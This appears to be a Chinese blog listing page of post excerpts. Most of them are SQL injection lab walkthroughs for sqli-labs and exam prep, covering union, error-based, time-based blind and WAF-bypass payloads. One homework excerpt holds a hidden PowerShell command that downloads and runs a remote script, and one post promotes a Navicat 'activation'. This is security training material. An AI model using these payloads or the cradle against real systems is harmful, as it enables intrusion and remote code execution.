+
  • 2025-01-23cisp-pte 备考攻略|0基础小白学习sql注入(六):报错注入
    例题:Less-5DoubleQuery-SingleQuotes-String知识点:报错注入的原理就是搭建一个恒成立的常见的报错注入(1)、大体架构为:$a=想要执行的语句$b=floor(rand(0)*2)selectcount(*),concat($a$b)随便输入一个id=1,页面发生变化,说明存在数据交互输入?id=1'页面如下,
  • 2025-01-12HNU-编译原理lab2-2022级
    文章目录实验要求主要工作实验难点1、Bison文件2、分析树的生成3、理解Bison和Flex的关系①YYSTYPE②归约③%type④%token⑤`yylval`实验设计1、补充`lexical_analyzer.l`2、补充`syntax_analyzer.y`(1)union(2)%token与%type(4)%type的解析规则实验结果验证1、执行命
  • 2025-01-06跟狂神学习第一天,了解Markdown语法
    Markdown学习一个#+空格+标题名字=大标题/一级标题二级标题两个#+空格+标题=二级标题三个#+空格+标题=三级标题.......(以此类推)一直到六级标题字体hello!粗体:文字两边同时加两个*hello!斜体:文字两边同时加一个*hello!斜体加粗:文字两边同时加三个*hello删除线:文字
  • 2024-12-30总结
    总结SQL观察源码发现包含andunion空格的过滤union通过双写绕过and用&&代替空格用%20代替确定闭合?id=1'%20--+确定显示位?id=1'%20uniunionon%20select%201,2,3,4%20--+查询库名?id=1'%20uniunionon%20select%201,database(),3,4%20--+查询表名?id=1'%20uniu
  • 2024-12-23sql注入
    1、SQLInjectionSQL注入(SQLInjection):通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在
  • 2024-12-23Solution - Luogu P11402 [Code+#8 初赛] 图
    首先通过手玩,发现对于小的\(n\)都有\(m_{\max}\len\),于是直接猜测这个结论并尝试证明。首先对于\(n\le4\)的情况,首先可以直接通过手玩知道\(m_{\max}\len\)。对于\(n>4\)的情况,考虑\(n\)从小到大证明。若\(m>n\),则\(\sum\limits_{i=1}^n\operatorname{de
  • 2024-12-20SQL注入
    对上一篇文章的进一步说明,补充了报错注入和sql注入getshell0x01:联合查询注入常用语句:/?id=1'and1'='2或/?id=1and1=2//判断是字符型注入还是数字型注入//下面以字符型为例/?id=1'unionselect1,2,3#//爆回显位/?id=1'unionselect1,2,database()#//爆数据库名/?i
  • 2024-12-19异常
    异常分类BaseException #所有异常的基类(*)+--SystemExit #解释器请求退出+--KeyboardInterrupt#用户中断执行(通常是输入^C)+--GeneratorExit #生成器(generator)发生异常来通知退出+--Exception #常规异常的基类+--StopIteratio
  • 2024-12-1111.30
    网络安全C10-2024.11.30@所有人作业:CVE-2018-4878漏洞复现powershell-windowstylehidden-execbypass-c"IEX(New-ObjectNet.WebClient).DownloadString('http://10.0.0.164:80/magedu.ps1');test.ps1"实现WAF安装与配置3、WAF绕过SQL注入(1)分别在无WAF和有WAF的情况下,利用SQ
  • 2024-12-07mssql靶场-手工注入(第一关)
    Mssql数据库相⽐mysql数据库本质上的框架是差不多的,使⽤的增,删,改,查命令是互相通的,但是Mysql中使⽤的函数在mssql中有些会起不到作⽤点。SQLSERVER--->MSSQL--14331.MSSQL中⾃带数据库信息2.MSSQL系统视图表(MSSQL数据库与MYSQL数据库⼀样,⾃带数据表sysobjects和sysco
  • 2024-12-05时间盲注笔记
    1.判断是否存在延迟注入?id=1'andsleep(5)--+2.判断当前数据库长度,正确的话就会延迟5秒执行?id=1'andif(length(database())>1,sleep(5),1)--+3.判断当前数据库名?id=1'andif(substr(database(),1,1)="a",sleep(5),1)--+4.查询当前数据库下有几张表?id=1'andif((se
  • 2024-12-05Sql注入(靶场)六-八关
    第六关1.测试报错字符?id=1'#正常?id=1"#错误双引号引起报错说明页面有报错语句的位置2.测试闭合注释为"--+?id=1"--+分别测试列的数量和进⾏回显位置测试:?id=1"orderby4--+#报错?id=1"orderby3--+#正常得出3列?id=-1"unionselect1,2,3--+
  • 2024-12-02SQL注入靶场(第三关)
    1.判断是否存在注入?id=1?id=2?id=1'报错,闭合点为'),初步猜测为字符型2.判断注入类型?id=1'and'1'='1?id=1'and'1'='2注入类型为字符型3.猜字段?id=1')orderby3--+?id=1')orderby4--+有三个字段4.确定回显
  • 2024-12-02SQL注入靶场(第五关)
    报错注入1.判断是否存在注入?id=1?id=1'报错,闭合点为',初步判断为字符型2.判断注入类型?id=1'and'1'='1?id=1'and'1'='2注入类型为字符型3.猜字段名?id=1'orderby3--+?id=1'orderby4--+有三个字段4.确定回显位?id=-1'unio
  • 2024-12-02SQL注入靶场(第四关)
    1.判断是否存在注入?id=1?id=2?id=1"报错,闭合点为"),初步猜测为字符型2.判断注入类型?id=1"and"1"="1?id=1"and"1"="2注入类型为字符型3.猜字段?id=1")orderby3--+?id=1")orderby4--+有三个字段4.确定回显位?i
  • 2024-12-02python - 异常
    Exception和Error的区别python与java不一样,python的所有异常类,都继承自BaseException,并不严格区分Error和Exception。以SyntaxError为例,名字虽然叫Error,但实际也是继承自Exception。java的规范:将可预知的,而不影响程序执行的,称之为Exception,比如:参数格式不
  • 2024-11-23sqli-labs做题过程详解
    Less-11.判断注入点提示我们输入一个id,因此构造payload为?id=1and1=2页面正常回显,可判断为字符型。接着判断闭合方式,构造payload为?id=1'页面报错,因此可判断闭合方式为单引号。然后我们可以用–+注释掉’,在中间添加我们想要查询的语句2.联合注入1.判断有多少
  • 2024-12-05【C语言】在 Linux 终端编写、编译并运行 Hello world 程序
    步骤创建并打开hello-world文件夹mkdirhello-worldcdhello-world使用vim创建main.cvimmain.c写入代码并保存#include<stdio.h>intmain(){printf("Hello,world!\n");return0;}#include<stdio.h>是一个预处理命令,用于包含标准输入输
  • 2024-12-04【前端知识】npm命令行详细说明
    npm命令行详细说明概述一、定义与功能二、基本命令三、配置文件与注册表四、应用场景五、高级特性环境设置1.设置镜像源2.配置全局依赖存储路径3.配置缓存路径4.查看所有配置5.清除缓存6.升级npm版本npm组件打包1.初始化项目2.安装依赖3.构建脚本4.打包项目5
  • 2024-12-02八皇后问题
    八皇后问题是一个经典的回溯算法问题。要求在一个8×8的国际象棋棋盘上放置8个皇后,使得任意两个皇后都不在同一行、同一列和同一斜线上。八皇后解题思路和方法:可以使用回溯算法来解决。回溯算法是一种试探性的搜索算法,它会尝试在每一行放置一个皇后,然后检查是否满足条件
  • 2024-12-02YOLOv8改进 | 损失函数篇:SlideLoss与FocalLoss的细节优化与应用【YOLOv8】
    本专栏专为AI视觉领域的爱好者和从业者打造。涵盖分类、检测、分割、追踪等多项技术,带你从入门到精通!后续更有实战项目,助你轻松应对面试挑战!立即订阅,开启你的YOLOv8之旅!专栏订阅地址:https://blog.csdn.net/mrdeam/category_12804295.html文章目录YOLOv8改进|损失函数
  • 2024-11-27mysql入门之基础
    SHOWDATABASES;SHOWTABLESFROMmysql;SHOWDATABASES;#使用myemployees库,或者说切换到myemployees库USEmyemployees;DESCemployees;DESCRIBEemployees;SHOWCOLUMNSFROMemployees;SHOWCOLUMNSFROMtest.person;SELECT `employee_id`, `first_name`,
  • 2024-11-26实战部署若依项目-前后端分离
    第一步安装数据库安装MySQLyum -yinstall  mysql-server启动数据库并更改密码systemctl start  mysqldgrep 'password' /var/log/mysqld.logmysqladmin  -uroot  -p'初始密码'  password  '新密码'创建数据库,创建授权用户create databa
  • 2024-11-25Navicat Premium15下载和激活
    PS:下载好后,建议先断开本地网络!!!建议先断开本地网络!!!建议先断开本地网络!!! 下载链接:https://pan.baidu.com/s/193HBkJaGZ2M3fer8zQZwRQ?pwd=be12提取码:be12复制这段内容后打开百度网盘手机App,操作更方便哦 1安装NavicatPremium注意:安装完成后不要运行navicat,将“Navicat
  • 2024-11-23JavaWeb中的分层解耦
    第一步:控制反转@Component注解:将当前类交给IOC容器管理,成为IOC容器中的bean第二步:依赖注入@Autowired注解:运行时,IOC容器会提供被注解的类型的bean对象,并赋值给该变量要切换不同的实现时,只需要将被切换的Service实现中的@Component注释掉,将新的Service实现中加上@Co